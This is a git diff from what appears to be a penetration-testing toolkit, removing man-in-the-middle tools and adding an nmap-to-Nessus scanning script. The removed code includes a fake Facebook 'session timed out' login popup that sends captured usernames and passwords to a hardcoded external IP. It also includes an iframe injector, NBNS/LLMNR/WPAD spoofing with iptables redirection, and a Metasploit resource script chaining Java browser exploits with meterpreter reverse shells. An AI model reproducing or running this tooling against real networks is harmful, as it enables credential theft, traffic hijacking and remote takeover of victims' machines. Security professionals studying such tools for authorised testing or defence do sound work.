'; - answer = document.getElementById('uname').value+':'+document.getElementById('pass').value; - } - - - // Check whether the user has entered a user/pass and pressed ok - function checker(){ - uname1 = document.getElementById("uname").value; - pass1 = document.getElementById("pass").value; - valcheck = document.getElementById("buttonpress").value; - - if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") { - // Join user/pass and send to attacker - answer = "source=facebook&"; - answer += "username="+uname1+"&password="+pass1; - $.ajax({ - type: "GET", - url: "http://96.126.106.188:8888/bin/process", - data: answer, - success: function() { - } - }); - //beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer); - // Set lastchild invisible - document.getElementById("popup").setAttribute('style','display:none'); - //document.body.lastChild.setAttribute('style','display:none'); - clearInterval(credgrabber); - // Lighten screen - grayOut(false); - //$j('#popup').remove(); - //$j('#darkenScreenObject').remove(); - - }else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){ - // If user has not entered any data reset button - document.getElementById("buttonpress").value = "false"; - alert("Please enter a valid username and password."); - } - } - - - // Facebook floating div - function facebook() { - - sneakydiv = document.createElement('div'); - sneakydiv.setAttribute('id', 'popup'); - sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); - document.body.appendChild(sneakydiv); - - // Set appearance using styles, maybe cleaner way to do this with CSS block? - var windowborder = 'style="width:330px;background:white;border:10px #999999 solid;border-radius:8px"'; - var windowmain = 'style="border:1px #555 solid;"'; - var tbarstyle = 'style="color: rgb(255, 255, 255); background-color: rgb(109, 132, 180);font-size: 13px;font-family:tahoma,verdana,arial,sans-serif;font-weight: bold;padding: 5px;padding-left:8px;text-align: left;height: 18px;"'; - var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; - var messagestyle = 'style="align:left;font-size:11px;font-family:tahoma,verdana,arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; - var box_prestyle = 'style="color: grey;font-size: 11px;font-weight: bold;font-family: tahoma,verdana,arial,sans-serif;padding-left:30px;"'; - var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color: rgb(109,132,180);"'; - var buttonstyle = 'style="font-size: 13px;background:#627aac;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; - - var title = 'Facebook Session Timed Out'; - var messagewords = 'Your session has timed out due to inactivity.

Please re-enter your username and password to login.'; - var buttonLabel = ''; - - // Build page including styles - sneakydiv.innerHTML= '
' +title+ '

' + messagewords + '

Email:
Password:
' + '
' +buttonLabel+ '
'; - - // Repeatedly check if button has been pressed - credgrabber = setInterval(checker,3000); - } - - - // Generic floating div with image - function generic() { - sneakydiv = document.createElement('div'); - sneakydiv.setAttribute('id', 'popup'); - sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:20%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000'); - sneakydiv.setAttribute('align', 'center'); - document.body.appendChild(sneakydiv); - sneakydiv.innerHTML= '

Your session has timed out!

For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.

Username:
Password:


'; - - // Repeatedly check if button has been pressed - credgrabber = setInterval(checker,3000); - - } - - // Set background opacity and apply background - var backcolor = "<%== @backing %>"; - if(backcolor == "Grey"){ - grayOut(true,{'opacity':'70'}); - } else if(backcolor == "Clear"){ - grayOut(true,{'opacity':'0'}); - } - diff --git a/mitm/iframe_injector b/mitm/iframe_injector deleted file mode 100755 index 3434d40..0000000 --- a/mitm/iframe_injector +++ /dev/null @@ -1,57 +0,0 @@ -#!/usr/bin/env python -""" - Zap encoding in requests and inject iframe after body tag in html responses. - Usage: - iframe_injector http://someurl/somefile.html -""" -from libmproxy import controller, proxy, platform -import os -import sys - - -class InjectingMaster(controller.Master): - def __init__(self, server, iframe_url): - controller.Master.__init__(self, server) - self._iframe_url = iframe_url - - def run(self): - try: - return controller.Master.run(self) - except KeyboardInterrupt: - self.shutdown() - - def handle_request(self, msg): - if 'Accept-Encoding' in msg.headers: - msg.headers["Accept-Encoding"][0] = 'none' - msg.reply() - - def handle_response(self, msg): - if msg.content: - c = msg.replace('', '' % self._iframe_url) - if c > 0: - print 'Iframe injected!' - msg.reply() - - -def main(argv): - if len(argv) != 2: - print "Usage: %s IFRAME_URL" % argv[0] - sys.exit(1) - iframe_url = argv[1] - TRANSPARENT_SSL_PORTS = [443, 8443] - trans = dict( - resolver = platform.resolver(), - sslports = TRANSPARENT_SSL_PORTS - ) - config = proxy.ProxyConfig( - cacert = os.path.expanduser("~/.mitmproxy/mitmproxy-ca.pem") - #transparent_proxy = trans - - ) - server = proxy.ProxyServer(config, 8080) - print 'Starting proxy...' - m = InjectingMaster(server, iframe_url) - m.run() - -if __name__ == '__main__': - main(sys.argv) diff --git a/mitm/mitm.py b/mitm/mitm.py deleted file mode 100755 index 56097c8..0000000 --- a/mitm/mitm.py +++ /dev/null @@ -1,497 +0,0 @@ -import subprocess -from twisted.web.server import Site -from twisted.web.static import File -from twisted.web import server, resource -from twisted.internet import reactor, protocol -import os,socket,struct,fcntl,sys,commands,time -from subprocess import Popen, PIPE -from termcolor import colored, cprint -import os.path -#import sqlite3 - -sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -sockfd = sock.fileno() -SIOCGIFADDR = 0x8915 - -websvrIP = "" -metasploitIP = "" -mitmIP = "" -wpadNbnsIP = "" - -#References for Java Exploits -#CVE-2012-0500 -#exploit/windows/browser/java_ws_vmargs -#windows/meterpreter/reverse_tcp -#JDK/JRE 7 update 2 and earlier -#JDK/JRE 6 update 30 and earlier - -#CVE-2012-0507 -#exploit/multi/browser/java_atomicreferencearray -#java/meterpreter/reverse_tcp -#JDK/JRE 7 update 2 and earlier -#JDK/JRE 6 update 30 and earlier -#JDK/JRE 5 update 33 and earlier - -#CVE-2012-1723 -#exploit/multi/browser/java_verifier_field_access -#java/meterpreter/reverse_tcp -#JDK/JRE 7 update 4 and earlier -#JDK/JRE 6 update 32 and earlier -#JDK/JRE 5 update 35 and earlier - -#CVE-2012-4681 -#exploit/multi/browser/java_jre17_exec -#java/meterpreter/reverse_tcp -#JDK/JRE 7 update 6 and earlier -#JDK/JRE 6 update 34 and earlier - -#CVE-2012-5088 -#exploit/multi/browser/java_jre17_method_handle -#java/meterpreter/reverse_tcp -#JDK/JRE 7 update 7 and earlier -#JDK/JRE 6 update 35 and earlier -#JDK/JRE 5 update 36 and earlier - -#CVE-2012-1533 -#exploit/windows/browser/java_ws_double_quote -#windows/meterpreter/reverse_tcp -#JDK/JRE 7 update 7 and earlier -#JDK/JRE 6 update 35 and earlier - -#CVE-2013-0422 -#exploit/multi/browser/java_jre17_jmxbean -#java/meterpreter/reverse_tcp -#JDK/JRE 7 update 10 and earlier - -#CVE-2013-0431 -#exploit/multi/browser/java_jre17_jmxbean_2 -#java/meterpreter/reverse_tcp -#JDK/JRE 7 update 11 and earlier - -#CVE-2013-1493 -#exploit/windows/browser/java_cmm -#windows/meterpreter/reverse_tcp -#JDK/JRE 7 update 15 and earlier -#JDK/JRE 6 update 41 and earlier -#JDK/JRE 5 update 40 and earlier - -#CVE-2013-1488 -#exploit/multi/browser/java_jre17_driver_manager -#java/meterpreter/reverse_tcp -#JDK/JRE 7 update 17 and earlier - -#CVE-2013-2465 -#exploit/multi/browser/java_storeimagearray -#java/meterpreter/reverse_tcp -#JDK/JRE 7 update 21 and earlier -#JDK/JRE 6 update 45 and earlier -#JDK/JRE 5 update 45 and earlier - -def createWPAD(interface): - contents = 'function FindProxyForURL(url, host) {if (isInNet(host, "127.0.0.1","255.255.255.0")){return "DIRECT";}return "PROXY '+interface+':8080; DIRECT";}' - file = open("wpad.dat","w") - file.write(contents) - file.close() - -def createHTML(localIP,metasploitIP): - #userAgent = MSIE 8.0 - #use exploit/windows/browser/ms13_055_canchor - - #Create iframe landing page to provide plugin detection and redirection to metasploit - file = open("pluginDetect4.htm", "w") - file.write("") - file.write("") - - file.write('') - file.write('') - file.write('') - - file.write('') - file.write("") - file.write("test") - file.write("") - file.close() - -def createMetasploitRC(metasploitIP): - javaExploits = [] - javaExploits.append("exploit/windows/browser/java_ws_vmargs") - javaExploits.append("exploit/multi/browser/java_atomicreferencearray") - javaExploits.append("exploit/multi/browser/java_verifier_field_access") - javaExploits.append("exploit/windows/browser/java_ws_vmargs") - javaExploits.append("exploit/multi/browser/java_jre17_method_handle") - javaExploits.append("exploit/multi/browser/java_jre17_jmxbean") - javaExploits.append("exploit/windows/browser/java_cmm") - javaExploits.append("exploit/multi/browser/java_jre17_driver_manager") - javaExploits.append("exploit/windows/browser/java_ws_double_quote") - javaExploits.append("exploit/multi/browser/java_jre17_exec") - javaExploits.append("exploit/multi/browser/java_storeimagearray") - - javaCVE = [] - javaCVE.append("") - javaCVE.append("CVE-2012-0507") - javaCVE.append("CVE-2012-1723") - javaCVE.append("CVE-2012-4681") - javaCVE.append("CVE-2012-5088") - javaCVE.append("CVE-2012-1533") - javaCVE.append("CVE-2012-0422") - javaCVE.append("CVE-2013-0431") - javaCVE.append("CVE-2013-1493") - javaCVE.append("CVE-2013-1488") - javaCVE.append("CVE-2013-2465") - - payloads = [] - payloads.append("windows/meterpreter/reverse_tcp") - payloads.append("java/meterpreter/reverse_tcp") - payloads.append("java/meterpreter/reverse_tcp") - payloads.append("windows/meterpreter/reverse_tcp") - payloads.append("java/meterpreter/reverse_tcp") - payloads.append("java/meterpreter/reverse_tcp") - payloads.append("windows/meterpreter/reverse_tcp") - payloads.append("java/meterpreter/reverse_tcp") - payloads.append("windows/meterpreter/reverse_tcp") - payloads.append("java/meterpreter/reverse_tcp") - payloads.append("java/meterpreter/reverse_tcp") - - srvPORTs = [] - srvPORTs.append("4001") - srvPORTs.append("4002") - srvPORTs.append("4003") - srvPORTs.append("4004") - srvPORTs.append("4005") - srvPORTs.append("4006") - srvPORTs.append("4007") - srvPORTs.append("4008") - srvPORTs.append("4009") - srvPORTs.append("4010") - srvPORTs.append("4011") - - #Create metasploit resource file - #metasploitIP = "127.0.0.1" - #localIP = "127.0.0.1" - #metasploitIP = get_ip('eth0:1') - - metasploitResource = "use auxiliary/spoof/nbns/nbns_response\nset verbose TRUE\nset regex wpad\nset spoofip "+get_ip('eth0:4')+"\nrun\nsleep 3\n" - metasploitResource+="spool /tmp1/msf3_output.txt\n" - metasploitResource += "use auxiliary/spoof/llmnr/llmnr_response\nset verbose true\nset regex wpad\nset spoofip "+get_ip('eth0:4')+"\nrun\nsleep 3\n" - metasploitResource += "use auxiliary/server/wpad\nset SRVHOST "+get_ip('eth0:4')+"\nset PROXY "+get_ip('eth0')+"\nset PROXYPORT 8080\nset verbose true\nexploit\n" - metasploitResource += "setg exitonsession false\nsetg LHOST "+metasploitIP+"\nsetg SRVPORT 80\nsetg SRVHOST "+metasploitIP+"\nsleep 5\n" - count=0 - LPORT=4000 - totalNum=len(javaExploits) - while count/dev/null 2>&1") - if response!=0: - mycmd = "ifconfig eth0:1 "+newInterface - commands.getstatusoutput(mycmd) - localIP = get_ip('eth0:1') - newIP=True - lastDigit+=1 - else: - lastDigit+=1 - - newIP=False - while newIP==False: - if lastDigit==0: - lastDigit = int(localIPsplit[3])+2 - newInterface = localIPsplit[0]+"."+localIPsplit[1]+"."+localIPsplit[2]+"."+str(lastDigit) - print "[+] Setting up eth0:2 interface" - print "[+] Checking if IP is in use: "+str(newInterface) - response = os.system("ping -c 1 -w2 "+newInterface + " >/dev/null 2>&1") - if response!=0: - mycmd = "ifconfig eth0:2 "+newInterface - commands.getstatusoutput(mycmd) - localIP = get_ip('eth0:2') - newIP=True - lastDigit+=1 - else: - lastDigit+=1 - - - newIP=False - while newIP==False: - if lastDigit==0: - lastDigit = int(localIPsplit[3])+3 - newInterface = localIPsplit[0]+"."+localIPsplit[1]+"."+localIPsplit[2]+"."+str(lastDigit) - print "[+] Setting up eth0:3 interface" - print "[+] Checking if IP is in use: "+str(newInterface) - response = os.system("ping -c 1 -w2 "+newInterface + " >/dev/null 2>&1") - if response!=0: - mycmd = "ifconfig eth0:3 "+newInterface - commands.getstatusoutput(mycmd) - localIP = get_ip('eth0:3') - newIP=True - lastDigit+=1 - else: - lastDigit+=1 - - newIP=False - while newIP==False: - if lastDigit==0: - lastDigit = int(localIPsplit[3])+4 - newInterface = localIPsplit[0]+"."+localIPsplit[1]+"."+localIPsplit[2]+"."+str(lastDigit) - print "[+] Setting up eth0:4 interface" - print "[+] Checking if IP is in use: "+str(newInterface) - response = os.system("ping -c 1 -w2 "+newInterface + " >/dev/null 2>&1") - if response!=0: - mycmd = "ifconfig eth0:4 "+newInterface - commands.getstatusoutput(mycmd) - localIP = get_ip('eth0:4') - newIP=True - lastDigit+=1 - else: - lastDigit+=1 - - - - websvrIP = get_ip('eth0:1') - metasploitIP = get_ip('eth0:2') - mitmIP = get_ip('eth0:3') - wpadNbnsIP = get_ip('eth0:4') - -#Enable ip forwarding -mycmd = "echo 1 > /proc/sys/net/ipv4/ip_forward" -commands.getstatusoutput(mycmd) - -#Forward traffic from port 80 to port 8080 (mitmproxy) -mycmd = [] -mycmd.append("iptables --flush") -mycmd.append("iptables -t nat --flush") -mycmd.append("iptables --zero") -mycmd.append("iptables -A FORWARD --in-interface eth0:3 -j ACCEPT") -mycmd.append("iptables -t nat -A PREROUTING -i eth0:3 -p tcp --destination-port 80 -j REDIRECT --to-port 8080") -mycmd.append("iptables -t nat -A PREROUTING -i eth0:3 -p tcp --dport 443 -j REDIRECT --to-port 8080") -for cmdi in mycmd: - commands.getstatusoutput(cmdi) - -websvrIP = get_ip('eth0:1') -metasploitIP = get_ip('eth0:2') -mitmIP = get_ip('eth0:3') -wpadNbnsIP = get_ip('eth0:4') - -print "Stats/WebSvr IP (eth0:1) "+"\t"+str(websvrIP) -print "BrowsePwn IP (eth0:2) "+"\t\t"+str(metasploitIP) -print "Mitmproxy (eth0:3) "+"\t\t"+str(mitmIP) -print "Wpad/Nbns IP (eth0:4) "+"\t\t"+str(wpadNbnsIP) - -createWPAD(get_ip('eth0')) -createMetasploitRC(metasploitIP) -createHTML(get_ip('eth0:3'),metasploitIP) - -#Run mitmproxy to inject the iframe -#mitmproxyPath = "python "+os.getcwd()+"/iframe_injector http://"+get_ip('eth0:3')+"/pluginDetect4.htm" -#iframeURL = "http://"+get_ip('eth0')+"/pluginDetect4.htm" -#args = "[+] Run this in another terminal '"+mitmproxyPath+"'" -#print colored(args,'green',attrs=['bold']) -#p1 = Popen(args1,shell=True) - -#Allow an IP to request the resource only once -bannedIPs = [] -class Simple(resource.Resource): - count=0 - isLeaf = True - def render_GET(self, request): - clientIP = request.getClientIP() - #if clientIP not in bannedIPs: - file = request.path.strip("/") - if("detectVersion.asp" not in file): - if("favicon.ico" not in file): - #count = bannedIPs.count(clientIP) - #print count - #if count<99: - #if count==0: - print colored("Client IP: "+clientIP,'green',attrs=['bold']) - if "pluginDetect4.htm" in file: - count = bannedIPs.count(clientIP) - if count==0: - bannedIPs.append(clientIP) - with open(file) as source: - return source.read() - else: - with open(file) as source: - return source.read() - else: - #if clientIP not in bannedIPs: - #count = bannedIPs.count(clientIP) - #if count<99: - #conn = sqlite3.connect("logs.db") - queryString = (str(request).strip("HTTP/1.1>")).split("?") - #print queryString[1] - parameters = queryString[1].split("&") - if "CVE" in str(parameters): - for parameter in parameters: - if len(parameter)>4: - print colored(parameter,'yellow',attrs=['bold']) - else: - for parameter in parameters: - parameter = parameter.strip() - parameter = parameter.replace("%20"," ") - print parameter - -#Run metasploit - -mycmd = "netstat -rn | grep 0.0.0.0 | awk '{print $2}' | grep -v '0.0.0.0'" -gateway = commands.getstatusoutput(mycmd) - -args = "[+] Run this in another terminal 'screen -S msf -d -m /tmp1/metasploit-framework/msfconsole -r "+os.getcwd()+"/msf1.rc'" -#p2 = Popen(args,shell=True) -print colored(args,'green',attrs=['bold']) -#args = "[+] Run this in another terminal 'arpspoof -i eth0 -t "+sys.argv[1]+" "+str(gateway[1])+"'" -#print colored(args,'green',attrs=['bold']) - -#Web server for serving iframe landing page -""" -if not os.path.exists("logs.db"): - conn = sqlite3.connect("logs.db") - conn.execute('''CREATE TABLE logs (ID INT PRIMARY KEY NOT NULL, - IP TEXT NOT NULL, - CVE TEXT NOT NULL, - BROWSER TEXT NOT NULL, - BROWSERVERSION TEXT NOT NULL, - USERAGENT TEXT NOT NULL, - QTVERSION TEXT NOT NULL, - AXVERSION TEXT NOT NULL, - FLASHVERSION TEXT NOT NULL, - IEVERSION TEXT NOT NULL, - JAVAVERSION TEXT NOT NULL, - PDFJSVERSION TEXT NOT NULL, - PDFREADERVERSION TEXT NOT NULL, - REALPLAYERVERSION TEXT NOT NULL, - SHOCKWAVEVERSION TEXT NOT NULL, - SILVERLIGHTVERSION TEXT NOT NULL, - VLCVERSION TEXT NOT NULL, - WINDOWSMPVERSION TEXT NOT NULL);''') - conn.close() -""" -mycmd = "screen -S iframe -d -m python2.7 "+os.getcwd()+"/iframe_injector http://"+get_ip("eth0:3")+"/pluginDetect4.htm" -args = "[+] Run this in another terminal '"+mycmd+"'" -print colored(args,'green',attrs=['bold']) -#subprocess.Popen(mycmd,shell=True) - -site = server.Site(Simple()) -reactor.listenTCP(80, site,interface=get_ip('eth0:3')) -try: - reactor.run() -except KeyboardInterrupt: - reactor.stop() -PIDs = [] -PIDs.append("msfconsole") -PIDs.append("iframe") -killPID=[] -for i in PIDs: - mycmd = "pgrep -f "+i - output = commands.getstatusoutput(mycmd) - killPID.append(output[1]) -for x in killPID: - mycmd = "kill -9 "+str(x) - output = commands.getstatusoutput(mycmd) - - diff --git a/mitm/msf1.rc b/mitm/msf1.rc deleted file mode 100755 index 4898e8d..0000000 --- a/mitm/msf1.rc +++ /dev/null @@ -1,59 +0,0 @@ -setg exitonsession false -setg LHOST 192.168.0.108 -setg SRVPORT 80 -setg SRVHOST 192.168.0.108 -sleep 3 -use exploit/multi/browser/java_jre17_jmxbean -set PAYLOAD java/meterpreter/reverse_tcp -set URIPATH /CVE-2013-0431 -set LPORT 4000 -exploit -jz -sleep 2 -use exploit/multi/browser/java_atomicreferencearray -set PAYLOAD java/meterpreter/reverse_tcp -set URIPATH /CVE-2012-0507 -set LPORT 4001 -exploit -jz -sleep 2 -use exploit/multi/browser/java_verifier_field_access -set PAYLOAD java/meterpreter/reverse_tcp -set URIPATH /CVE-2012-1723 -set LPORT 4002 -exploit -jz -sleep 2 -use exploit/windows/browser/java_ws_vmargs -set PAYLOAD windows/meterpreter/reverse_tcp -set URIPATH /CVE-2012-0500 -set LPORT 81 -exploit -jz -sleep 2 -use exploit/multi/browser/java_jre17_method_handle -set PAYLOAD java/meterpreter/reverse_tcp -set URIPATH /CVE-2012-5088 -set LPORT 4004 -exploit -jz -sleep 2 -use exploit/windows/browser/java_cmm -set PAYLOAD windows/meterpreter/reverse_tcp -set URIPATH /CVE-2013-1493 -set LPORT 4005 -exploit -jz -sleep 2 -use exploit/multi/browser/java_jre17_driver_manager -set PAYLOAD java/meterpreter/reverse_tcp -set URIPATH /CVE-2013-1488 -set LPORT 4006 -exploit -jz -sleep 2 -use exploit/windows/browser/java_ws_double_quote -set PAYLOAD windows/meterpreter/reverse_tcp -set URIPATH / -set LPORT 4007 -exploit -jz -sleep 2 -use exploit/multi/browser/java_jre17_exec -set PAYLOAD java/meterpreter/reverse_tcp -set URIPATH /CVE-2012-4681 -set LPORT 82 -exploit -jz -sleep 2 diff --git a/mitm/pluginDetect4.htm b/mitm/pluginDetect4.htm deleted file mode 100755 index 72bd026..0000000 --- a/mitm/pluginDetect4.htm +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/mitm/readme.txt b/mitm/readme.txt deleted file mode 100755 index f0b90c0..0000000 --- a/mitm/readme.txt +++ /dev/null @@ -1,12 +0,0 @@ -pip install pyopenssl -pip install netlib -pip install flask -pip install termcolor - -or - -wget https://pypi.python.org/packages/source/t/termcolor/termcolor-1.1.0.tar.gz -wget https://pypi.python.org/packages/source/p/pyOpenSSL/pyOpenSSL-0.13.1.tar.gz -wget https://pypi.python.org/packages/source/n/netlib/netlib-0.9.2.tar.gz -wget https://pypi.python.org/packages/source/F/Flask/Flask-0.10.1.tar.gz - diff --git a/mitm/savecookies.js b/mitm/savecookies.js deleted file mode 100755 index cd323e7..0000000 --- a/mitm/savecookies.js +++ /dev/null @@ -1,49 +0,0 @@ -var expdate = new Date (); -expdate.setTime (expdate.getTime() + (24 * 60 * 60 * 1000*365)); // 1 yr from now -/* ####################### start set cookie ####################### */ -function setCookie(name, value, expires, path, domain, secure) { - var thisCookie = name + "=" + escape(value) + - ((expires) ? "; expires=" + expires.toGMTString() : "") + - ((path) ? "; path=" + path : "") + - ((domain) ? "; domain=" + domain : "") + - ((secure) ? "; secure" : ""); - document.cookie = thisCookie; -} -/* ####################### start show cookie ####################### */ -function showCookie(){ -alert(unescape(document.cookie)); -} -/* ####################### start get cookie value ####################### */ -function getCookieVal (offset) { - var endstr = document.cookie.indexOf (";", offset); - if (endstr == -1) - endstr = document.cookie.length; - return unescape(document.cookie.substring(offset, endstr)); -/* ####################### end get cookie value ####################### */ -} -/* ####################### start get cookie (name) ####################### */ -function GetCookie (name) { - var arg = name + "="; - var alen = arg.length; - var clen = document.cookie.length; - var i = 0; - while (i < clen) { - var j = i + alen; - if (document.cookie.substring(i, j) == arg) - return getCookieVal (j); - i = document.cookie.indexOf(" ", i) + 1; - if (i == 0) break; - } - return null; -} -/* ####################### end get cookie (name) ####################### */ -/* ####################### start delete cookie ####################### */ -function DeleteCookie (name,path,domain) { - if (GetCookie(name)) { - document.cookie = name + "=" + - ((path) ? "; path=" + path : "") + - ((domain) ? "; domain=" + domain : "") + - "; expires=Thu, 01-Jan-70 00:00:01 GMT"; - } -} - diff --git a/mitm/wpad.dat b/mitm/wpad.dat deleted file mode 100755 index 4493c9a..0000000 --- a/mitm/wpad.dat +++ /dev/null @@ -1,9 +0,0 @@ -function FindProxyForURL(url, host) { - // URLs within this network are accessed directly - if (isInNet(host, "127.0.0.1", "255.255.255.0")) - { - return "DIRECT"; - } - return "PROXY 10.0.20.172:8080; DIRECT"; - } - diff --git a/nessus/README.md b/nessus/README.md index d396076..efae49f 100644 --- a/nessus/README.md +++ b/nessus/README.md @@ -1 +1,131 @@ -Migrated to https://github.com/milo2012/nmap2nessus +Prerequisites +``` +pip install requests --upgrade +``` + + +sudo python nmap2ness.py -h +usage: nmap2ness.py [-h] [-s HOSTIP] [-n SCANID] [-u USERNAME] [-p PASSWORD] + [-i INFILE] [-o OUTFILE] +``` +optional arguments: + -h, --help show this help message and exit + -s HOSTIP [nessus server IP] + -u USERNAME [username] + -p PASSWORD [password] + -t TEMPLATEFILE [Nessus template name to use] + -i INFILE [nmap xml file] + -n SCANID [lookup job based on scan_id (optional)] + -o OUTFILE [nessus report (csv) (optional)] +``` + +#####Start a nessus scan by connecting to Nessus server 127.0.0.1 + +sudo python nmap2ness.py -u root -p 1234 -i nmapt_target.xml -s 127.0.0.1 +``` +- Launching new Nessus scan +- Extracting ports from nmapt_target.xml +- Modifying Nessus policy +- Logging into Nessus +- Uploading Policy +- Starting Nessus Scan +- Checking Job Status: 224 : running +- Checking Job Status: 224 : running +- Checking Job Status: 224 : running +- Checking Job Status: 224 : running +- Checking Job Status: 224 : running +- Checking Job Status: 224 : running +- Checking Job Status: 224 : paused +- Checking Job Status: 224 : paused +- Checking Job Status: 224 : paused +- Checking Job Status: 224 : paused +- Checking Job Status: 224 : paused +- Checking Job Status: 224 : canceled + +- Summary of Results (Critical/High/Medium) +Critical 176.28.50.165:80 PHP Unsupported Version Detection +High 176.28.50.165:80 PHP 5.3.x < 5.3.29 Multiple Vulnerabilities +Medium 176.28.50.165:110 SSL Certificate Expiry +Medium 176.28.50.165:110 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:110 SSL Self-Signed Certificate +Medium 176.28.50.165:143 SSL Certificate Expiry +Medium 176.28.50.165:143 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:143 SSL Self-Signed Certificate +Medium 176.28.50.165:25 SSL Certificate Expiry +Medium 176.28.50.165:25 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:25 SSL Self-Signed Certificate +Medium 176.28.50.165:465 SSL Certificate Expiry +Medium 176.28.50.165:465 SSL Version 2 and 3 Protocol Detection +Medium 176.28.50.165:465 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:465 SSL Self-Signed Certificate +Medium 176.28.50.165:465 SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE) +Medium 176.28.50.165:993 SSL Certificate Expiry +Medium 176.28.50.165:993 SSL Version 2 and 3 Protocol Detection +Medium 176.28.50.165:993 SSL Weak Cipher Suites Supported +Medium 176.28.50.165:993 SSL Medium Strength Cipher Suites Supported +Medium 176.28.50.165:993 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:993 SSL Self-Signed Certificate +Medium 176.28.50.165:993 SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE) +Medium 176.28.50.165:995 SSL Certificate Expiry +Medium 176.28.50.165:995 SSL Version 2 and 3 Protocol Detection +Medium 176.28.50.165:995 SSL Weak Cipher Suites Supported +Medium 176.28.50.165:995 SSL Medium Strength Cipher Suites Supported +Medium 176.28.50.165:995 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:995 SSL Self-Signed Certificate +Medium 176.28.50.165:995 SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE) + +- Nessus report has been saved to: report.csv +``` +#####If you have started a Nessus job but the scripts accidentally gets terminated, you can connect back to the Nessus server by specifying the Scan_ID using the -n parameter + +sudo python nmap2ness.py -u root -p 1234 -n 224 +``` +- Logging into Nessus +- Starting Nessus Scan +- Checking Job Status: 224 : running +- Checking Job Status: 224 : running +- Checking Job Status: 224 : running +- Checking Job Status: 224 : running +- Checking Job Status: 224 : running +- Checking Job Status: 224 : running +- Checking Job Status: 224 : paused +- Checking Job Status: 224 : paused +- Checking Job Status: 224 : paused +- Checking Job Status: 224 : paused +- Checking Job Status: 224 : paused +- Checking Job Status: 224 : canceled + +- Summary of Results (Critical/High/Medium) +Critical 176.28.50.165:80 PHP Unsupported Version Detection +High 176.28.50.165:80 PHP 5.3.x < 5.3.29 Multiple Vulnerabilities +Medium 176.28.50.165:110 SSL Certificate Expiry +Medium 176.28.50.165:110 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:110 SSL Self-Signed Certificate +Medium 176.28.50.165:143 SSL Certificate Expiry +Medium 176.28.50.165:143 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:143 SSL Self-Signed Certificate +Medium 176.28.50.165:25 SSL Certificate Expiry +Medium 176.28.50.165:25 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:25 SSL Self-Signed Certificate +Medium 176.28.50.165:465 SSL Certificate Expiry +Medium 176.28.50.165:465 SSL Version 2 and 3 Protocol Detection +Medium 176.28.50.165:465 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:465 SSL Self-Signed Certificate +Medium 176.28.50.165:465 SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE) +Medium 176.28.50.165:993 SSL Certificate Expiry +Medium 176.28.50.165:993 SSL Version 2 and 3 Protocol Detection +Medium 176.28.50.165:993 SSL Weak Cipher Suites Supported +Medium 176.28.50.165:993 SSL Medium Strength Cipher Suites Supported +Medium 176.28.50.165:993 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:993 SSL Self-Signed Certificate +Medium 176.28.50.165:993 SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE) +Medium 176.28.50.165:995 SSL Certificate Expiry +Medium 176.28.50.165:995 SSL Version 2 and 3 Protocol Detection +Medium 176.28.50.165:995 SSL Weak Cipher Suites Supported +Medium 176.28.50.165:995 SSL Medium Strength Cipher Suites Supported +Medium 176.28.50.165:995 SSL Certificate Cannot Be Trusted +Medium 176.28.50.165:995 SSL Self-Signed Certificate +Medium 176.28.50.165:995 SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE) + +- Nessus report has been saved to: report.csv +``` diff --git a/nessus/nmap2nessus.py b/nessus/nmap2nessus.py new file mode 100644 index 0000000..adfd860 --- /dev/null +++ b/nessus/nmap2nessus.py @@ -0,0 +1,366 @@ +#!/usr/bin/env python +import urllib +import argparse +import operator +import requests +from StringIO import StringIO +import json +import time +import sys +import uuid +import requesocks +from lxml import etree +import lxml.etree as et +import xml.etree.ElementTree as ET +import csv + +requests.packages.urllib3.disable_warnings() +defaultNessusPolicy=" private root 10180 Ping the remote host Ping the remote host[checkbox]:Interpret ICMP unreach from gateway checkbox Interpret ICMP unreach from gateway no no 10180 Ping the remote host Ping the remote host[checkbox]:Fast network discovery checkbox Fast network discovery no no 10180 Ping the remote host Ping the remote host[checkbox]:Test the local Nessus host checkbox Test the local Nessus host yes yes 10180 Ping the remote host Ping the remote host[checkbox]:Log live hosts in the report checkbox Log live hosts in the report no no 10180 Ping the remote host Ping the remote host[checkbox]:Make the dead hosts appear in the report checkbox Make the dead hosts appear in the report no no 10180 Ping the remote host Ping the remote host[checkbox]:Do an applicative UDP ping (DNS,RPC...) checkbox Do an applicative UDP ping (DNS,RPC...) no no 10180 Ping the remote host Ping the remote host[entry]:Number of retries (ICMP) : entry Number of retries (ICMP) : 2 2 10180 Ping the remote host Ping the remote host[checkbox]:Do an ICMP ping checkbox Do an ICMP ping yes yes 10180 Ping the remote host Ping the remote 